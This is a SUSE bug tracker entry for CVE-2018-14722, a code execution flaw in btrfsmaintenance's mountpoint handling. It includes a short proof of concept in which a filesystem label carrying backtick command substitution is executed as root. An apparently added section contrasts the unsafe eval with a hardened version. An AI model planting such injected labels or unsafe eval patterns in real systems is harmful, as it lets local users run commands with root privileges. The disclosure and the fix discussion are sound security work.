Bug 1102721 - (CVE-2018-14722) VUL-0: CVE-2018-14722: btrfsmaintenance: Code execution
Status: RESOLVED FIXED
Classification: Novell Products
Product: SUSE Security Incidents
Component: Incidents
Version: unspecified
Hardware: Other
OS: Other
Priority: P3 - Medium
Severity: Normal
Assigned To: David Sterba
Security Team bot
https://smash.suse.de/issue/211726/
CVSSv3.1:SUSE:CVE-2018-14722:6.7:(AV:...
Reported: 2018-07-26 09:28 UTC by Karol Babioch
Modified: 2021-07-19 14:26 UTC (History)
Description Karol Babioch 2018-07-26 09:28:30 UTC
Hi,

I just stumbled across the evaluate_auto_mountpoint function in
/usr/share/btrfsmaintenance/btrfsmaintenance-functions.

# function: evaluate_auto_mountpoint
# parameter: A variable name
#
# this function checks whether the variable contains the special keyword "auto"
# if yes, all currently mounted btrfs filesystems are evaluated and their mountpoints
# are put into the parameter variable
evaluate_auto_mountpoint() {
        MOUNTPOINTSVAR=\$"$1"
        if [ "$(eval expr \"$MOUNTPOINTSVAR\")" = "auto" ]; then
                ...
                # find one (and only one) corresponding mountpoint for each btrfs device node
                for DEVICE in $BTRFS_DEVICES; do
                        MNT=$(findmnt --types btrfs --first-only --noheadings --output "TARGET" --source "$DEVICE")
                        if [ -n "$MNTLIST" ]; then
                                MNTLIST="$MNTLIST:$MNT"
                        else
                                MNTLIST="$MNT"
                        fi
                done
                echo "evaluate mounted filesystems: $MNTLIST"
                eval "$1=$MNTLIST"
        fi
}

The 'eval "$1=$MNTLIST"' allows bash command evaluation.
This is triggered by btrfs-{scrub,balance,trim}.timer units if the respective
option in /etc/sysconfig/btrfsmaintenance is set to "auto". Fortunately that is
not the default.

PoC:

> mkfs.btrfs -fL '`logger pwned`' /dev/sdc2
(mount as user using your favorite tool)
> (as root, to accelerate) systemctl start btrfs-trim
> journalctl
...
Jul 26 10:55:57 linux-e202.suse.de btrfs-trim.sh[23928]: evaluate mounted filesystems: /run/media/fvogt/`logger pwned`
Jul 26 10:55:57 linux-e202.suse.de root[23943]: pwned
...

Cheers,
Fabian
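The report's root cause is that the mountpoint string is spliced into the text that `eval` parses, so a filesystem label containing backticks becomes shell code. The following is an added example (not btrfsmaintenance's own code, and not the upstream fix) that puts the unsafe pattern beside a hardened one: the variable name is validated and only the name is spliced into the `eval` string, while the value is referenced through an escaped expansion and therefore assigned verbatim after parsing. The function names `expand_unsafe`, `expand_safe` and `evaluate_auto_mountpoint_safe` are hypothetical, and the mountpoint list is a constructed stand-in for `findmnt` output so the script runs offline; the backtick payload is a harmless `echo` marker.

```shell
#!/bin/sh
# Added example, not code from the btrfsmaintenance project.

# Unsafe pattern as in the report: the value becomes part of the string that
# eval parses, so any command substitution inside it is executed.
expand_unsafe() {
    eval "$1=$2"
}

# Hardened pattern: refuse anything that is not a plain identifier as the
# target name, and reference the value via an escaped '$' so eval only ever
# parses 'NAME=$_ex_value' and assigns the content literally.
expand_safe() {
    case "$1" in
        ""|[0-9]*|*[!A-Za-z0-9_]*)
            echo "expand_safe: invalid variable name: $1" >&2
            return 1 ;;
    esac
    _ex_value="$2"
    eval "$1=\$_ex_value"
}

# Safe re-implementation of the "auto" expansion. The mountpoints come from a
# constructed list (one per line) that stands in for findmnt output; the third
# entry mimics the report's PoC label with a harmless marker.
evaluate_auto_mountpoint_safe() {
    _eam_name="$1"
    # Read the config variable's current value without re-parsing its content.
    eval "_eam_current=\$$_eam_name"
    [ "$_eam_current" = "auto" ] || return 0
    _eam_list=""
    while IFS= read -r _eam_mnt; do
        [ -n "$_eam_mnt" ] || continue
        if [ -n "$_eam_list" ]; then
            _eam_list="$_eam_list:$_eam_mnt"
        else
            _eam_list="$_eam_mnt"
        fi
    done <<'EOF'
/
/home
/run/media/user/`echo INJECTED`
EOF
    expand_safe "$_eam_name" "$_eam_list"
}

# Stand-alone demonstration: the marker is never executed in the safe path.
BTRFS_TRIM_MOUNTPOINTS=auto
evaluate_auto_mountpoint_safe BTRFS_TRIM_MOUNTPOINTS
echo "safe result: $BTRFS_TRIM_MOUNTPOINTS"
```

In the safe path the configured variable ends up holding the literal text `/:/home:/run/media/user/`echo INJECTED``, whereas `expand_unsafe` with the same third entry yields `/run/media/user/INJECTED`, i.e. the substitution ran. The `case` guard on the variable name matters because `eval "$1=..."` also trusts the caller's name argument; here it is a fixed config variable name, but a whitelist costs nothing.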
Comment 8 Karol Babioch 2018-07-30 06:42:16 UTC
CVE-2018-14722 has been assigned to this. We are planning to announce this via linux-distros to let other distributions know. This will give us (at maximum) a two-week window of opportunity to get this fixed in time.
Comment 14 David Sterba 2018-08-09 12:33:02 UTC
Created attachment 779339 [details]
expand-auto-safely-v2

Fixed typo, updated changelog.
Comment 16 Fabian Vogt 2018-08-09 12:54:55 UTC
Comment on attachment 779339 [details]
expand-auto-safely-v2

There's a typo in the commit message:

> mkfs.btrfs --label "`/evil/command`' /dev/sdx

The only bug that remains is that with ":" in mountpoints it won't do its job for that device, but it won't break anything else. So not a security relevant bug AFAICT.
Comment 17 Marcus Meissner 2018-08-14 15:54:15 UTC
making public
Comment 19 David Sterba 2018-09-25 14:16:55 UTC
Upstream release 0.4.2 contains the fix, now submitted to Factory. I'll continue with SLE15 update.
Comment 20 Johannes Segitz 2018-10-09 11:08:35 UTC
(In reply to David Sterba from comment #19)
didn't see it until now, please submit.  Thank you
Comment 23 Marcus Meissner 2021-07-19 14:26:25 UTC
not yet submitted for SUSE:SLE-15:Update.

we rate it below cvss v3.1 score 7, so we will not address it for SLE 15 update.